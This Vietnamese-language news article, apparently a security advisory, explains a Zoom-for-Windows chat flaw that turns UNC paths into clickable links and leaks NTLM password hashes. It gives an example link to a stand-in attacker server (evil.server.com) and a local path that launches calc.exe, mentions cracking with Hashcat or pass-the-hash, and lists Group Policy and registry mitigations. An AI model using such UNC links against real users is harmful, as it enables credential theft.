Hotline: 094.320.0088

Lỗ hổng trong ứng dụng Zoom tiết lộ thông tin đăng nhập Windows

Ứng dụng Zoom cho Windows dễ bị tấn công UNC path injection trong tính năng trò chuyện, có thể cho phép kẻ tấn công đánh cắp thông tin đăng nhập Windows của người dùng nhấp vào liên kết trong cuộc trò chuyện.

Khi sử dụng ứng dụng Zoom, người tham gia cuộc họp có thể liên lạc với nhau bằng cách gửi tin nhắn văn bản qua giao diện trò chuyện.

Khi gửi tin nhắn trò chuyện, mọi URL được gửi sẽ được chuyển đổi thành siêu liên kết để các thành viên khác có thể nhấp vào chúng để mở một trang web trong trình duyệt mặc định của họ.

Nhà nghiên cứu bảo mật @_g0dmode đã phát hiện ra rằng ứng dụng Zoom sẽ chuyển đổi các đường dẫn UNC của mạng Windows thành một liên kết có thể nhấp trong các tin nhắn trò chuyện.

remote shareNhư bạn có thể thấy từ các tin nhắn trò chuyện ở trên, một URL thông thường và đường dẫn UNC của \\evil.server.com\images\cat.jpg đều được chuyển đổi thành một liên kết có thể nhấp trong tin nhắn trò chuyện.

Nếu người dùng nhấp vào liên kết đường dẫn UNC, Windows sẽ cố gắng kết nối với trang web từ xa bằng giao thức chia sẻ tệp SMB để mở tệp cat.jpg từ xa.

Khi thực hiện việc này, theo mặc định, Windows sẽ gửi tên đăng nhập của người dùng và hàm băm mật khẩu NTLM của họ. Với hàm băm mật khẩu NTLM, kẻ tấn công có thể bẻ khóa bằng các công cụ miễn phí như Hashcat để tìm ra mật khẩu ở dạng văn bản thuần hoặc tấn công pass-the-hash.

capturing password hashesNgoài việc đánh cắp thông tin đăng nhập Windows, Hickey cho biết thêm rằng UNC injects cũng có thể được sử dụng để khởi chạy chương trình trên máy tính cục bộ khi nhấp vào liên kết.

Ví dụ, khi người dùng nhấp vào đường dẫn UNC như \\127.0.0.1\C$\windows\system32\calc.exe, ứng dụng sẽ cố gắng khởi chạy ứng dụng Máy tính trong Windows. Rất may, Windows sẽ nhắc người dùng cho phép chương trình chạy trước khi chương trình được thực thi.

launch programĐể khắc phục vấn đề này, Zoom cần ngăn hệ thống trò chuyện chuyển đổi đường dẫn UNC thành các siêu liên kết có thể nhấp.

Hiện tại, lỗ hổng này vẫn chưa được vá, do đó để ngăn ngừa việc gửi thông tin danh tính NTLM tới máy chủ từ xa, bạn có thể thực hiện cách dưới đây.

Đi tới đường dẫn và thiết lập như hình dưới: Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers

group policy 2

Đối với người dùng Windows 10 Home, bạn phải tạo khóa RestrictSendingNTLMTraffic và thiết lập giá trị 2 trong regedit: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0

registry editor

Nguồn whitehat.vn

 

AEH

Khóa học Hacker Mũ Trắng – AEH